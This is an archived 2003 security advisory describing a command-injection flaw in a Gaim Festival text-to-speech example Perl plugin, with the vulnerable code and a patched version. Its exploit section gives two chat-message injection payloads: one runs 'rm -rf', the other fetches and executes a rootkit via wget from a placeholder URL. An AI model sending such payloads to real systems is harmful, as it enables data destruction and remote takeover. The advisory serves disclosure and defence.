[UNIX] Gaim Festival Example Plugin Command Execution Vulnerability (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 10/15/03
- Previous message: SecuriTeam: "[NT] Cross-Site Scripting Vulnerability in Wrensoft Zoom Search Engine"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 15 Oct 2003 19:05:46 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Gaim Festival Example Plugin Command Execution Vulnerability (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://sourceforge.net/projects/gaim/> Gaim is an all-in-one IM client
that resembles AIM. Gaim lets you use AIM, ICQ, Yahoo, MSN, IRC, Jabber,
Napster, Zephyr, and Gadu-Gadu, all at once. Gaim is NOT endorsed by or
affiliated with AOL, Yahoo, MSN, or Napster. An example plugin provided by
(which many copy-paste from) allows remote attackers to cause it to
execute arbitrary code.
DETAILS
A vulnerability exists in any plugin that has copied its code from the
example plugin to execute arbitrary code.
Vulnerable code (from the example plugin):
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
system("echo \"$string\" | /usr/bin/festival --tts");
}
As taken from:
<http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl>
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
As you can see the system command is executed without adequate attention
to the user provided input.
Exploit:
Just pass the plugin any of these messages (or really any message for that
matter):
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
rootkit;./rootkit
Solution:
A fixed version of the example plugin would look like this:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
$string =~ s/[^\w]//g;
system("echo \"$string\" | /usr/bin/festival --tts");
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:error@lostinthenoise.net>
error.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Cross-Site Scripting Vulnerability in Wrensoft Zoom Search Engine"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [EXPL] Gaim Stack Overflow (PoC)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A stack overflow vulnerability
exists in Gaim, ... Ron just threw together a quick plugin (based on an old ...
(Securiteam) - [UNIX] Squirrelmail Change_passwd Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... plugin, is "a Squirrelmail
plugin to allow your users to change his/her ... The vulnerable code is inside mainfunction
that neglects to verify ... GNU gdb 6.0-debian ... (Securiteam) - [UNIX] SquirrelMail Address Add Plugin XSS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... * Squirrelmail version 1.4.0 or
newer with Address Add Plugin version 1.9 ... The exploit may be triggered when the victim
clicks on a specially crafted ... Sep 25, 2005: First maintainer reply ... (Securiteam) - [UNIX] VLC Format String Vulnerability And Integer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... VLC Format String Vulnerability
And Integer Overflow ... VLC is vulnerable to a format string attack in the parsing of
Vorbis ... The SAP service discovery plugin must not enabled (it is disabled by ...
(Securiteam) - [NT] Microsoft License Manager and urlmon.dll COM Object Interaction Invalid Memory Access Vulnerabi
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Internet Explorer is "a
set of core technologies in Microsoft Windows ... exploitation of an invalid memory access
vulnerability in various ... COM objects may allow an attacker to execute arbitrary code.
... (Securiteam)